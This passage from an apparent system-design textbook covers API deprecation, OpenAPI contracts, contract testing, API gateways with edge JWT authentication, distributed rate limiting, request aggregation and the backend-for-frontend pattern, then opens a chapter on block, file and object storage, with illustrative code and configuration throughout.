(both), with FULL being the right default when producers and consumers deploy
on independent schedules.
Key Takeaways
- Schema evolution turns compatibility rules into automated checks instead of review discipline.
- Protobuf field numbers are permanent; reserve retired numbers and names.
- For JSON,
additionalProperties: trueis what keeps consumers tolerant and producers free to add fields.- Use a schema registry with
FULLcompatibility when producers and consumers deploy independently.
🧪 Practice
- Evolve a
Userprotobuf message to splitnameintofirst_nameandlast_namewithout breaking anyone. Show both stages.- Explain why Avro requires the writer's schema at read time and what infrastructure that implies.
- Interview: An event schema in production has a field nobody uses but everyone is afraid to remove. How do you remove it safely? (Hint: you need evidence before action — where does that evidence come from?)
Deprecation Policies
Removing something from an API is not a technical act, it is a coordination problem. The code change takes minutes; getting dozens of teams or thousands of external developers to stop calling an endpoint takes months. A deprecation policy is the published process that makes that coordination predictable instead of adversarial.
Without one, two failure modes appear. Either nothing is ever removed — and you maintain endpoints nobody has used since 2019 — or things are removed abruptly and you break paying customers. A policy replaces both with a schedule everyone can plan around.
A STANDARD DEPRECATION TIMELINE
T-0 Announce. Changelog, email, docs banner. Ship the replacement
FIRST — never deprecate before the alternative exists.
T-0.. Signal in-band. Deprecation and Sunset headers on every response;
log every call with the caller's identity.
T+1 month Contact the top callers directly. Offer migration help.
T+3 months Brownouts: return errors for short, announced windows (e.g. 30
minutes) so silent integrations discover the problem while
someone is watching.
T+6 months Sunset. Return 410 Gone with a link to the migration guide.
T+9 months Delete the code.
Timeline scales with audience: internal services can move in weeks; a public
API with enterprise contracts may need 12-24 months.
### Deprecation is announced in-band, on every response, per RFC 8594 / 9745
GET /v1/orders/42
HTTP/1.1 200 OK
Deprecation: true
Sunset: Sat, 01 Aug 2026 00:00:00 GMT
Link: <https://docs.example.com/migrate/v2>; rel="deprecation"; type="text/html"
Warning: 299 - "Deprecated API: /v1/orders is removed on 2026-08-01. Use /v2/orders."
### After sunset — 410 Gone, not 404: the difference is "it is gone" versus
### "it never existed", and only one of those tells the caller what to do.
HTTP/1.1 410 Gone
Content-Type: application/problem+json
{"code": "endpoint_sunset",
"message": "GET /v1/orders was removed on 2026-08-01.",
"migration_guide": "https://docs.example.com/migrate/v2"}
# You cannot deprecate what you cannot measure. Usage telemetry per caller is
# the difference between a confident removal and a hopeful one.
def deprecation_middleware(handler, endpoint, sunset_date):
def wrapped(request):
metrics.increment("api.deprecated_call", tags={
"endpoint": endpoint,
"client_id": request.auth.client_id, # WHO is still calling
"version": request.headers.get("User-Agent", "unknown"),
})
response = handler(request)
response.headers["Deprecation"] = "true"
response.headers["Sunset"] = sunset_date.strftime("%a, %d %b %Y %H:%M:%S GMT")
return response
return wrapped
# The removal decision then becomes evidence-based:
# "3 clients, 40 calls/day, all internal" -> remove next month
# "180 clients, 2M calls/day, 12 enterprise" -> the timeline is longer,
# and it starts with phone calls
The single most important rule: ship the replacement before announcing the deprecation. Telling people to stop using something that has no alternative generates resentment, not migrations.
Key Takeaways
- Deprecation is a coordination problem with a published schedule, not a code change.
- Signal in-band with
Deprecation,Sunset, andLinkheaders on every response.- Instrument usage per caller — removal decisions must be evidence-based.
- Ship the replacement first, use brownouts to flush out silent callers, and return
410 Goneafter sunset.
🧪 Practice
- Write a deprecation notice for an endpoint being replaced, including headers, changelog entry, and timeline.
- Design the telemetry needed to answer "can we remove this endpoint?" in one query.
- Interview: Your largest customer refuses to migrate before sunset. What do you do? (Hint: separate what is technically possible from what is commercially wise, and consider options between "break them" and "support it forever".)
API Documentation and Contracts
An undocumented API is effectively private: consumers cannot use it without reading your source or guessing, and every question becomes a support ticket. But hand-written documentation has a fatal flaw — it drifts. Within months, the docs describe an API that no longer exists, which is worse than no docs at all because it is confidently wrong.
The fix is to make the documentation a machine-readable contract that lives with the code, is validated in CI, and generates both the human-readable docs and the client libraries. The contract stops being a description of the API and becomes part of it.
OpenAPI is the standard for HTTP APIs (the equivalents being .proto files
for gRPC and the SDL for GraphQL).
openapi: 3.1.0
info:
title: Orders API
version: 1.4.0
paths:
/orders/{orderId}:
get:
operationId: getOrder # becomes the generated client's method name
summary: Retrieve a single order
parameters:
- name: orderId
in: path
required: true
schema: {type: string, pattern: '^[0-9]+$'}
responses:
'200':
description: The order
content:
application/json:
schema: {$ref: '#/components/schemas/Order'}
'404':
description: No such order
content:
application/problem+json:
schema: {$ref: '#/components/schemas/Problem'}
components:
schemas:
Order:
type: object
required: [id, status, total]
properties:
id: {type: string, example: "42"}
status: {type: string, enum: [pending, paid, cancelled]}
total: {type: string, example: "58.00"}
currency: {type: string, default: "EUR"} # optional: additive, safe
One artifact drives many outputs, which is what makes the contract worth maintaining:
+--> interactive docs (Swagger UI, Redoc)
|
+--> client SDKs in N languages (generated)
openapi.yaml -------+
+--> server request/response validation (middleware)
|
+--> mock server for consumer teams before you build
|
+--> CI diff check: does this PR break the contract?
There are two ways to keep the contract honest, and the choice matters:
| Approach | How it works | Trade-off |
|---|---|---|
| Design-first | Write the spec, review it, generate stubs, then implement | Better design, parallel client work; needs discipline to keep in sync |
| Code-first | Annotate handlers; generate the spec from code | Never drifts from implementation; design decisions happen implicitly, one endpoint at a time |
# Code-first with runtime validation: the framework derives the schema from
# type annotations, so the docs cannot drift from the handler signature.
from pydantic import BaseModel, Field
class OrderResponse(BaseModel):
id: str
status: Literal["pending", "paid", "cancelled"]
total: str = Field(pattern=r"^\d+\.\d{2}$")
currency: str = "EUR"
@app.get("/orders/{order_id}", response_model=OrderResponse, responses={404: {...}})
def get_order(order_id: str) -> OrderResponse:
...
# The OpenAPI document, the docs page, and the response validation all come
# from this one declaration. Changing the model changes all three at once.
Whatever the approach, documentation needs more than a schema dump. The parts consumers actually need — and that generators cannot produce — are authentication setup, a copy-pasteable first request, error semantics, rate limits, pagination conventions, idempotency rules, and a changelog.
Key Takeaways
- Hand-written docs drift; a machine-readable contract validated in CI does not.
- One OpenAPI (or
.proto, or SDL) artifact generates docs, SDKs, validation, mocks, and breaking-change checks.- Design-first gives better design; code-first guarantees accuracy — pick deliberately.
- Generated reference is not enough: add auth setup, a working example, error semantics, limits, and a changelog.
🧪 Practice
- Write an OpenAPI fragment for a paginated list endpoint with filters and a cursor.
- List everything a new developer needs to make their first successful call to an API you know, and check whether its docs cover all of it.
- Interview: How do you keep documentation in sync with implementation across 40 services? (Hint: think about what has to happen automatically, and at which point in the pipeline a mismatch should fail.)
Contract Testing
Integration testing across services does not scale. Spinning up twelve services to test one is slow, flaky, and expensive, so teams mock their dependencies instead — and mocks lie. A mock encodes what the consumer believes the provider does, and the day the provider changes, every test still passes and production breaks.
Contract testing closes that gap. The consumer's expectations are recorded as a machine-readable contract, and the provider verifies against it in its own CI. Nobody has to run both services together, but both are checked against the same shared truth.
INTEGRATION TESTS MOCKS CONTRACT TESTS
[consumer] [consumer] [consumer]
| | |
real call fake response records expectation
| | |
[provider] (nothing) [ contract file ]
|
accurate but slow, fast but can verified in
flaky, hard to run silently diverge provider's own CI
-> fast AND accurate
The flow is consumer-driven: the consumer writes tests against a stub whose interactions are captured into a pact; the provider replays those interactions against its real implementation.
// CONSUMER side: this test both verifies consumer code and emits the contract.
const { PactV3, MatchersV3: M } = require("@pact-foundation/pact");
const provider = new PactV3({ consumer: "web-checkout", provider: "orders-api" });
describe("fetching an order", () => {
it("returns the fields checkout needs", async () => {
provider
.given("order 42 exists and is paid") // provider state, set up on its side
.uponReceiving("a request for order 42")
.withRequest({ method: "GET", path: "/orders/42" })
.willRespondWith({
status: 200,
headers: { "Content-Type": "application/json" },
// Match on TYPE and shape, not exact values — otherwise the contract
// breaks whenever real data changes, which teaches people to ignore it.
body: {
id: M.string("42"),
status: M.regex("pending|paid|cancelled", "paid"),
total: M.decimal(58.0),
},
});
await provider.executeTest(async (mock) => {
const order = await fetchOrder(mock.url, "42"); // real consumer code
expect(order.total).toBe(58.0);
});
});
});
// Output: a pact file listing exactly the fields this consumer depends on.
# PROVIDER side: replay every consumer's pact against the real service in CI.
#
# pact-verifier --provider-base-url=http://localhost:8080 \
# --pact-broker-url=https://pacts.internal \
# --provider=orders-api --publish-verification-results
#
# Provider states are the setup hooks the contract refers to:
@provider_state("order 42 exists and is paid")
def setup_paid_order():
db.insert_order(id="42", status="paid", total="58.00")
# The provider's build now fails if it removes `status`, renames `total`, or
# changes the response code — BEFORE the change reaches the consumer.
The property that makes this valuable: the contract records only the fields a consumer actually uses. The provider learns exactly what it may change freely and what is load-bearing, which is precisely the information missing from the deprecation discussion earlier.
| Test type | Speed | Accuracy | Catches |
|---|---|---|---|
| Unit | Fast | n/a | Logic errors in one component |
| Contract | Fast | High | Interface mismatches between services |
| Integration | Slow | High | Wiring, config, real infrastructure |
| End-to-end | Slowest | Medium | Whole-journey failures; flaky at scale |
Contract testing does not replace the others; it removes the need for most cross-service integration tests, which are the slow and flaky ones.
Key Takeaways
- Mocks drift silently; contract tests verify the provider against the consumer's recorded expectations.
- Consumer-driven contracts capture only the fields consumers actually depend on.
- Providers verify all consumer pacts in their own CI, so breakage is caught before deployment.
- Match on types and shapes, not exact values, or the contract becomes noise people learn to ignore.
🧪 Practice
- Write a consumer contract for an endpoint returning a user profile where the consumer uses only
idanddisplay_name.- Explain how contract tests would have prevented a specific outage you have seen or read about.
- Interview: A provider wants to remove a field. How do contract tests tell them whether it is safe? (Hint: think about what the set of published pacts collectively represents.)
<a id="34-api-gateways-and-edge-services"></a>
3.4 API Gateways and Edge Services
The gateway is the single front door to a fleet of services; what it takes on determines how much every service behind it can stop worrying about.
Gateway Responsibilities
As soon as a system has more than a handful of services, a set of concerns appears in every one of them: authentication, TLS, rate limiting, logging, CORS, request size limits, retries. Implementing those twenty times produces twenty subtly different behaviours and twenty places to fix a bug. An API gateway is a specialized reverse proxy (Chapter 2) that handles these cross-cutting concerns once, at the edge.
The analogy is a building's reception desk. Visitors are checked in, badged, directed to the right floor, and logged — once, at the entrance — rather than each department running its own security check.
WITHOUT A GATEWAY WITH A GATEWAY
[client] --> [orders svc] auth? [client]
[client] --> [users svc] auth? |
[client] --> [search svc] auth? [API gateway] <- TLS, authn, rate limit,
| routing, logging, CORS
Every service reimplements: |
TLS, authn, rate limits, CORS, +-----+-----+-----+
logging, request limits v v v
[orders] [users] [search]
Each service is publicly (private network, trust the gateway's
exposed and independently assertions, focus on business logic)
attackable
| Responsibility | What the gateway does |
|---|---|
| TLS termination | One certificate store, one renewal process |
| Authentication | Validate tokens, reject anonymous traffic early |
| Authorization (coarse) | Scope and role checks; fine-grained stays in services |
| Rate limiting and quotas | Per client, per plan, per endpoint |
| Routing | Path, header, or weight-based to the right service |
| Request/response transform | Header injection, protocol translation (REST to gRPC) |
| Observability | One correlation id, uniform access logs and metrics |
| Resilience | Timeouts, retries, circuit breaking, load shedding |
| Security hygiene | Body size limits, CORS, WAF rules, IP allow/deny |
# A gateway route declaration: policy as configuration, not as code in
# every service.
routes:
- name: orders
match:
path: /v1/orders/**
methods: [GET, POST, PATCH, DELETE]
upstream: http://orders.internal:8080
policies:
- jwt_auth: {issuer: "https://auth.example.com", audience: "api"}
- rate_limit: {key: "$jwt.sub", limit: 1000, window: 60s}
- timeout: {request: 3s} # bound every upstream call
- retry: {attempts: 2, on: [502, 503, 504], budget: 10%}
# ^ retry budget caps retries at 10% of traffic: without it, a partial
# outage turns into a retry storm that finishes the service off
- cors: {origins: ["https://app.example.com"], max_age: 600}
- request_limit: {max_body: 1MB}
- strip_headers: [X-Internal-Trace, X-Debug] # never leak internals out
The gateway's great danger is becoming a distributed monolith's control plane: business logic creeps into gateway configuration, every team needs a change to it to ship anything, and the config becomes an undocumented, untestable program owned by nobody. The discipline is a hard line — the gateway handles concerns that are identical for all traffic; anything requiring domain knowledge belongs in a service.
It is also a single point of failure by construction. Run it redundantly across AZs, keep it stateless, load-test it as its own service, and make sure its own failure modes (config push, certificate expiry) are as well-drilled as any backend's.
Key Takeaways
- A gateway centralizes cross-cutting concerns so services do not each reimplement them.
- Typical duties: TLS, authn, rate limiting, routing, observability, timeouts, and security hygiene.
- Keep business logic out of gateway config, or it becomes an untestable shared program.
- The gateway is a single point of failure — make it redundant, stateless, and load-tested.
🧪 Practice
- List which of these belong in the gateway and which in the service: JWT signature validation, "can this user edit this order?", request size limits, currency conversion, CORS.
- Design gateway routes for three services with different auth requirements (public, authenticated, internal-only).
- Interview: What happens to your system when the gateway is down, and how do you reduce that risk? (Hint: consider both redundancy and whether every class of traffic must pass through it.)
Authentication at the Edge
Authentication is expensive and easy to get wrong, so doing it in every service is both wasteful and risky: twenty implementations mean twenty chances to skip a signature check. Terminating authentication at the edge means unauthenticated traffic never reaches your services at all, and the validation logic exists once.
The pattern has three steps: the gateway validates the credential, it translates it into a trusted internal representation, and services trust that representation because they are only reachable through the gateway.
EDGE AUTHENTICATION FLOW
[client] --Authorization: Bearer eyJ...--> [gateway]
|
1. verify signature against the issuer's public key
(cached JWKS — no network call per request)
2. check exp, iss, aud, and required scopes
3. reject early: 401 if invalid, 403 if scope missing
|
4. strip the client token, inject verified identity
v
X-User-Id: 7
X-Scopes: orders:read orders:write
X-Trace-Id: 01HQ8X4M2N
|
v
[orders service]
trusts these headers ONLY because the network guarantees
no other path exists — plus mTLS between gateway and service
# Gateway-side validation. The two costly operations are both cached.
import jwt
from cachetools import TTLCache
JWKS = TTLCache(maxsize=8, ttl=3600) # public keys change rarely
def authenticate(request):
header = request.headers.get("Authorization", "")
if not header.startswith("Bearer "):
raise Unauthorized("missing bearer token") # 401
token = header[7:]
try:
unverified = jwt.get_unverified_header(token)
key = jwks_for(unverified["kid"]) # key id -> public key, cached
claims = jwt.decode(
token, key,
algorithms=["RS256"], # PIN the algorithm. Accepting the token's
# own "alg" enables the classic 'alg: none'
# and HMAC-with-public-key attacks.
audience="api.example.com", # who the token was minted for
issuer="https://auth.example.com",
) # exp and nbf are checked by the library
except jwt.InvalidTokenError as e:
raise Unauthorized(str(e)) # 401
if "orders:read" not in claims.get("scope", "").split():
raise Forbidden("scope orders:read required") # 403, not 401
return claims
The critical design question is what the gateway can and cannot decide.
| Decision | Where it belongs | Why |
|---|---|---|
| Is this token authentic and unexpired? | Gateway | Identical for all traffic |
Does the caller have the orders:write scope? | Gateway | Coarse, encoded in the token |
| Is the caller allowed to edit order 42? | Service | Needs domain data the gateway lacks |
| Is this field visible to this role? | Service | Needs the response, not just the request |
Coarse authorization at the edge, fine-grained authorization in the service. A gateway that starts querying the orders database to make decisions has absorbed domain logic and become a bottleneck.
Two failure modes to design around. Revocation: a signed JWT stays valid until it expires, so immediate logout needs either short lifetimes with refresh tokens, or a revocation list checked at the edge. And the confused deputy: if a service can be reached without passing through the gateway, those injected identity headers become a trivial impersonation vector — enforce it with network policy and mTLS, never by convention.
Key Takeaways
- Validate credentials once at the edge; unauthenticated traffic never reaches services.
- Strip the client token and inject a verified internal identity that services can trust.
- Coarse checks (authentic, scoped) at the gateway; resource-level authorization in the service.
- Pin the signing algorithm, cache JWKS, and make the gateway the only network path to services.
🧪 Practice
- Explain the difference between
401and403and give a request that should receive each.- Design immediate logout for JWT-based auth without checking a database on every request.
- Interview: Your gateway injects
X-User-Idand services trust it. What could go wrong? (Hint: enumerate every network path that reaches a service and ask what stops a caller from setting that header themselves.)
Rate Limiting and Quotas
An API without limits is an API whose availability is controlled by its least careful client. One buggy retry loop, one aggressive scraper, or one enthusiastic customer can consume the capacity everyone else depends on. Rate limiting converts that shared risk into a bounded, per-client contract — and it is as much a fairness and business mechanism as a technical one.
Two related concepts are worth separating. A rate limit bounds short-term speed ("100 requests per minute") and protects capacity. A quota bounds longer-term consumption ("1 million requests per month") and usually encodes a commercial plan. Most APIs need both.
The algorithms themselves — token bucket, leaky bucket, sliding window — are covered in Chapter 6.3. What matters here is the interface design around them.
CHOOSING THE LIMIT KEY (this decision matters more than the algorithm)
by API key / client_id fair per customer; the default for authenticated APIs
by user id prevents one user of a shared client hogging it
by IP address the only option for unauthenticated traffic, but
NAT and mobile carriers put thousands behind one IP
by endpoint expensive endpoints deserve their own, tighter limit
by tenant multi-tenant fairness in B2B products
Best practice: layer them. A per-IP limit on the login endpoint, a per-client
limit overall, and a tighter per-endpoint limit on expensive operations.
# Distributed limiting: the counter must be shared, or N gateway instances
# each allow the full limit and the effective limit is N times too high.
LUA_TOKEN_BUCKET = """
local key, rate, burst, now = KEYS[1], tonumber(ARGV[1]), tonumber(ARGV[2]), tonumber(ARGV[3])
local b = redis.call('HMGET', key, 'tokens', 'ts')
local tokens = tonumber(b[1]) or burst
local ts = tonumber(b[2]) or now
tokens = math.min(burst, tokens + (now - ts) * rate) -- refill by elapsed time
local allowed = tokens >= 1
if allowed then tokens = tokens - 1 end
redis.call('HMSET', key, 'tokens', tokens, 'ts', now)
redis.call('EXPIRE', key, 120) -- self-cleaning keys
return {allowed and 1 or 0, math.floor(tokens)}
"""
# Executed as one Lua script so check-and-decrement is atomic; doing it as
# separate GET and SET calls is a race that leaks capacity under concurrency.
def check_limit(redis, client_id, rate_per_sec, burst):
allowed, remaining = redis.eval(LUA_TOKEN_BUCKET, 1,
f"rl:{client_id}", rate_per_sec, burst, time.time())
return bool(allowed), remaining
Communicating the limit is as important as enforcing it. A client that cannot see its budget can only discover it by hitting the wall.
### Every response carries the client's current standing
HTTP/1.1 200 OK
RateLimit-Limit: 1000
RateLimit-Remaining: 847
RateLimit-Reset: 34 # seconds until the window refills
### And a rejection says exactly how long to wait — never make clients guess
HTTP/1.1 429 Too Many Requests
Retry-After: 34
Content-Type: application/problem+json
{"code": "rate_limit_exceeded",
"message": "Rate limit of 1000 requests/minute exceeded.",
"retry_after_seconds": 34,
"docs": "https://docs.example.com/rate-limits"}
| Design decision | Guidance |
|---|---|
| Limit key | Prefer client/user identity; IP only for anonymous traffic |
| Burst allowance | Allow short bursts — real traffic is not smooth |
| Response headers | Always expose limit, remaining, and reset |
| Rejection status | 429 with Retry-After; 503 only for server overload |
| Cost weighting | Charge expensive endpoints more than one "unit" |
| Failure mode | Decide deliberately: fail-open (availability) or fail-closed (protection) when Redis is down |
| Internal traffic | Exempt or limit separately; do not throttle your own health checks |
That failure-mode row is the one teams discover during an incident. If the rate limiter's backing store goes down, does the gateway let everything through or reject everything? For most public APIs, fail-open is correct — a rate limiter outage should not become an API outage — but the choice must be made in advance, not by whichever exception handler happens to run.
Key Takeaways
- Rate limits protect short-term capacity; quotas encode longer-term commercial plans.
- The limit key (client, user, IP, endpoint) matters more than the algorithm; layer several.
- Distributed limiting needs a shared, atomically updated counter — otherwise the real limit is N times the configured one.
- Always return
429withRetry-Afterand expose limit/remaining/reset headers, and decide fail-open vs. fail-closed up front.
🧪 Practice
- Design limits for a three-tier API product (free, pro, enterprise), including burst behaviour and a monthly quota.
- Explain why per-IP limiting punishes legitimate users on mobile networks and corporate VPNs.
- Interview: Your rate limiter's Redis cluster fails. Should the gateway fail open or closed? (Hint: the answer differs for a public read API and for a login endpoint — say why.)
Request Routing and Aggregation
A gateway's most basic job is deciding where a request goes, and its most debated job is deciding whether it should combine several backend calls into one response. The first is unambiguously the gateway's business; the second is powerful and easy to abuse.
Routing rules resolve a request to an upstream by path, method, header, or weight. Because the rules are configuration rather than code, they also become the mechanism for progressive delivery — canaries, blue-green cutovers, and traffic mirroring all fall out of weighted routing.
routes:
# 1. Path-based: the common case, one prefix per service
- match: {path: /v1/orders/**}
upstream: orders.internal
# 2. Header-based: route internal testers to a new build
- match: {path: /v1/search/**, headers: {X-Beta: "true"}}
upstream: search-v2.internal
# 3. Weighted: a canary release — 5% of traffic to the new version
- match: {path: /v1/search/**}
upstreams:
- {target: search-v1.internal, weight: 95}
- {target: search-v2.internal, weight: 5}
# 4. Mirroring: send a copy to the new service, discard its response.
# Real production traffic, zero user risk. Beware side effects — never
# mirror writes to a service that will actually perform them.
- match: {path: /v1/pricing/**}
upstream: pricing-v1.internal
mirror: {target: pricing-v2.internal, percent: 10}
Aggregation addresses the N+1 round-trip problem from a different angle than GraphQL: instead of the client making five calls, the gateway makes them — on the fast internal network, in parallel — and returns one response.
// Gateway-side aggregation: 5 sequential client round trips (5 x 60 ms over
// the internet) become 1 client round trip plus parallel internal calls (~15 ms).
async function orderScreen(req, res) {
const orderId = req.params.id;
const order = await svc.orders.get(orderId); // must come first
// Everything independent runs concurrently, not sequentially.
const [customer, items, shipping] = await Promise.all([
svc.users.get(order.customerId),
svc.catalog.getMany(order.itemIds),
svc.shipping.quote(orderId).catch(() => null), // degrade, do not fail:
]); // a missing quote should not
// break the whole screen
res.json({
id: order.id,
total: order.total,
customer: { name: customer.name },
items,
shippingEstimate: shipping?.estimate ?? null, // explicit partial response
});
}
The trade-offs are real and worth naming before adopting aggregation:
| Benefit | Cost |
|---|---|
| One client round trip instead of many | The gateway now knows about response shapes |
| Parallel fan-out on a fast network | Its latency is the slowest call, not the average |
| Partial failure handled centrally | Failure semantics get complicated (what is fatal?) |
| Smaller payloads for mobile clients | Domain knowledge creeps into shared infrastructure |
The guardrail: aggregate mechanically, do not compute. Fetching several resources and assembling them into one JSON document is composition. Calculating a discount, deciding an order's status, or validating a business rule is domain logic and belongs in a service. When aggregation genuinely needs client-specific shaping, the answer is usually not a fatter shared gateway but the pattern in the next topic.
Key Takeaways
- Routing by path, header, and weight turns canaries, blue-green, and mirroring into configuration.
- Aggregation collapses client round trips by fanning out in parallel on the internal network.
- An aggregated response is only as fast as its slowest call — set per-call timeouts and degrade gracefully.
- Compose data at the gateway; never compute business logic there.
🧪 Practice
- Write routing rules for a canary that sends 1% of traffic to v2 while pinning internal testers to v2 by header.
- Implement an aggregation where one of three calls is optional and its failure must not fail the request.
- Interview: When does gateway aggregation become an anti-pattern? (Hint: watch for the moment a gateway change is required to ship a feature, and ask who owns that config.)
Backend-for-Frontend Pattern
A single API serving a web app, an iOS app, and a partner integration ends up serving none of them well. The web dashboard wants rich, denormalized payloads; the mobile app wants tiny responses because of battery and bandwidth; the partner wants a stable contract that never changes. Every change becomes a negotiation, and the API drifts toward a lowest common denominator that is verbose for one client and insufficient for another.
The Backend-for-Frontend (BFF) pattern resolves this by giving each client type its own thin API layer, owned by the team that builds that client. The BFF talks to the shared downstream services and shapes their responses for exactly one consumer.
ONE SHARED API BACKEND-FOR-FRONTEND
[web] ----\ [web] --> [web BFF] --\
[iOS] -----> [ one public API ] [iOS] --> [mobile BFF] ---> [services]
[partner] -/ | [partner] --> [partner API] --/
v
[services] Each BFF is owned by its client team,
ships on that client's schedule, and
Every change is a three-way optimizes for exactly one consumer.
negotiation; payloads suit nobody
// MOBILE BFF: one endpoint per screen, minimal payload, aggressive shaping.
app.get("/mobile/order-screen/:id", async (req, res) => {
const order = await services.orders.get(req.params.id);
const [customer, items] = await Promise.all([
services.users.get(order.customerId),
services.catalog.getMany(order.itemIds),
]);
res.json({
// Pre-formatted for display: the phone does no work and ships no
// formatting library. This IS client code — it just runs on a server.
title: `Order #${order.reference}`,
statusLabel: STATUS_LABELS[order.status],
totalFormatted: formatMoney(order.total, order.currency),
customerName: customer.name,
// Only what this screen renders: 3 fields per item, not 40.
items: items.map(i => ({ name: i.name, qty: i.quantity, thumb: i.thumbnailUrl })),
});
});
// WEB BFF: the same underlying services, a different shape entirely —
// full item records, edit permissions, and audit history for the desktop view.
| Aspect | Shared API | BFF per client |
|---|---|---|
| Payload fit | Compromise for everyone | Optimal per client |
| Release cadence | Coupled across all clients | Independent per client team |
| Ownership | A central API team (a bottleneck) | The client team owns its BFF |
| Code duplication | Low | Some logic repeats across BFFs |
| Services to run | Fewer | One more deployable per client type |
| Best for | Few clients, similar needs | Divergent clients, independent teams |
The failure modes are predictable. Too many BFFs — one per screen or per minor platform variant — multiplies operational cost for little gain; the useful granularity is one per client type with a distinct team and distinct needs. And business logic leaking into the BFF recreates the distributed monolith: a BFF should orchestrate and shape, while pricing, validation, and state transitions stay in the services that own them.
A BFF is not a replacement for the gateway. The gateway still handles TLS, authentication, and rate limiting for everyone; the BFF sits behind it and concerns itself only with shaping.
Key Takeaways
- A BFF gives each client type its own API layer, owned by that client's team.
- It removes the lowest-common-denominator compromise and decouples release schedules.
- Costs are duplicated logic and extra deployables — create one per client type, not per screen.
- BFFs orchestrate and shape; business logic stays in the owning services, and the gateway still fronts everything.
🧪 Practice
- Design the response shape for the same "order details" screen on a smartwatch, a phone, and a desktop dashboard.
- Identify which logic in a BFF you have seen (or can imagine) should have been in a downstream service instead.
- Interview: When is a BFF overkill? (Hint: count the client types, the teams, and how much their data needs actually differ.)
Chapter Summary
| Concept | The one-line version |
|---|---|
| Resource modeling | Organize around domain nouns; HTTP methods supply the verbs |
| Idempotency | Retries are inevitable — POST needs a client-generated idempotency key |
| Statelessness | No server state whose loss breaks correctness; any instance serves any request |
| Errors | 4xx do not retry, 5xx do; stable codes, trace ids, never leak internals |
| Pagination | Cursor for anything unbounded; offset drifts and degrades with depth |
| Filtering | Query string with allowlisted, indexed fields and a deterministic tiebreaker |
| REST | Reuses HTTP semantics and caching; pays with fixed response shapes |
| GraphQL | Client-specified shapes; pays with query cost, N+1 resolvers, lost caching |
| gRPC | Binary over HTTP/2 for internal high-volume calls; field numbers are forever |
| SOAP | XML with message-level security and formal contracts; isolate behind an adapter |
| Webhooks | Provider pushes to a consumer URL: sign it, deduplicate it, ack fast |
| Style choice | Decided by consumer and interaction shape; one system uses several |
| Versioning | A last resort; URI path is the pragmatic default; every version needs a sunset |
| Compatibility | Tolerant reading enables additive change; new enum values secretly break clients |
| Schema evolution | Make compatibility a CI check, not review discipline |
| Deprecation | A schedule plus per-caller telemetry; ship the replacement first |
| Contracts | One machine-readable spec generates docs, SDKs, validation, and mocks |
| Contract testing | Consumer expectations verified in the provider's CI — fast and accurate |
| Gateway | Cross-cutting concerns once at the edge; keep domain logic out |
| Edge auth | Validate once, inject verified identity; coarse at the edge, fine in services |
| Rate limiting | The key matters more than the algorithm; shared atomic counters; 429 + Retry-After |
| Aggregation | Compose data at the gateway, never compute |
| BFF | One API layer per client type, owned by that client's team |
<a id="4-data-storage-and-database-design"></a>
4. Data Storage and Database Design
Storage is where most systems ultimately succeed or fail: compute is easy to add and easy to lose, but data must survive, stay correct, and remain queryable as it grows by orders of magnitude. This chapter works up from how bytes are physically organized, through relational and non-relational stores, to the replication, partitioning, and lifecycle machinery that keeps data available at scale.
<a id="41-storage-fundamentals"></a>
4.1 Storage Fundamentals
Every database is a program built on top of files and disks; understanding that layer explains why databases behave the way they do under load.
Block, File, and Object Storage
Before choosing a database, you choose how bytes are addressed on the infrastructure beneath it. Three abstractions dominate, and they differ in what the smallest addressable unit is — which in turn determines latency, mutability, scalability, and price.
Block storage exposes a raw device as a sequence of fixed-size blocks with no
notion of files. It is what a disk actually is, and it is what a database wants:
the engine imposes its own structure and can rewrite any block in place.
File storage adds a hierarchy of directories and files with shared access
semantics — the familiar filesystem, usable by many machines at once via NFS or
SMB. Object storage discards the hierarchy entirely: you PUT and GET
whole immutable blobs by key over HTTP, and the system scales essentially without
limit.
The analogy: block storage is a blank warehouse floor where you install your own shelving. File storage is a filing cabinet with labelled drawers. Object storage is a valet service — hand over a box, get a ticket, and ask for it back later; you never reach in and change part of it.
BLOCK FILE OBJECT
[ block 0 ][ block 1 ] /reports/2026/q1.pdf PUT /bucket/reports/q1.pdf
[ block 2 ][ block 3 ] /reports/2026/q2.pdf GET /bucket/reports/q1.pdf
addressed by offset addressed by path addressed by key
mutable in place mutable in place immutable (replace whole object)
one writer (usually) many readers/writers massively concurrent
~0.1-1 ms ~1-10 ms ~20-200 ms
EBS, SAN, local NVMe NFS, EFS, SMB S3, GCS, Azure Blob
# The access pattern each abstraction is built for.
# BLOCK: the database seeks to an offset and rewrites 8 KB in place.
with open("/dev/nvme0n1", "r+b") as dev:
dev.seek(page_no * 8192) # random access by offset
dev.write(page_bytes) # in-place mutation of one page
# FILE: shared, hierarchical, POSIX semantics (locks, permissions, append)
with open("/mnt/shared/uploads/report.csv", "a") as f:
f.write(row) # many machines can mount the same tree
# OBJECT: whole-blob replace over HTTP; there is no "write 8 bytes at offset 4096"
s3.put_object(Bucket="media", Key="videos/42/master.mp4", Body=blob)
# Changing one byte means re-uploading the object. That constraint is exactly
# what lets the service scale to exabytes with 11 nines of durability.
| Property | Block | File | Object |
|---|---|---|---|
| Unit | Fixed-size block | File in a directory | Whole object with a key |
| Mutation | In place, byte-level | In place, byte-level | Replace entire object |
| Latency | Lowest | Low | Highest (HTTP round trip) |
| Scalability | One volume, one host | Limited by the server | Effectively unlimited |
| Cost per GB | Highest | High | Lowest (with cold tiers) |
| Metadata | None | Path, permissions | Rich, user-defined |
| Typical use | Database volumes | Shared app files, home directories | Media, backups, logs, data lakes |
The design rule that follows: large binary objects belong in object storage, with only a pointer in the database. Storing a 5 MB image as a database blob inflates backups, evicts useful pages from the buffer pool, and makes replication expensive — for a file that a CDN could have served directly from object storage.
Key Takeaways
- The three abstractions differ in addressable unit: block, file, and whole object.
- Block storage is what databases want — low latency and in-place mutation.
- Object storage trades mutability and latency for unlimited scale, durability, and low cost.
- Store blobs in object storage and keep only the key in your database.
🧪 Practice
- Choose a storage type for each: a PostgreSQL data volume, user-uploaded profile photos, a shared build cache across CI runners, seven years of audit logs.
- Explain why appending one line to a 1 GB object in S3 is expensive and what pattern avoids it.
- Interview: A team stores 2 MB PDFs as
BYTEAcolumns in Postgres and backups now take six hours. What do you change and how do you migrate? (Hint: think about what the database is uniquely good at, and what it is merely capable of.)
Storage Engines Overview
A database has two largely separable halves: the part that understands queries (parser, planner, executor) and the part that actually puts bytes on disk and finds them again. That second half is the storage engine, and it determines almost every performance characteristic you will observe — write throughput, read latency, space usage, and compaction behaviour.
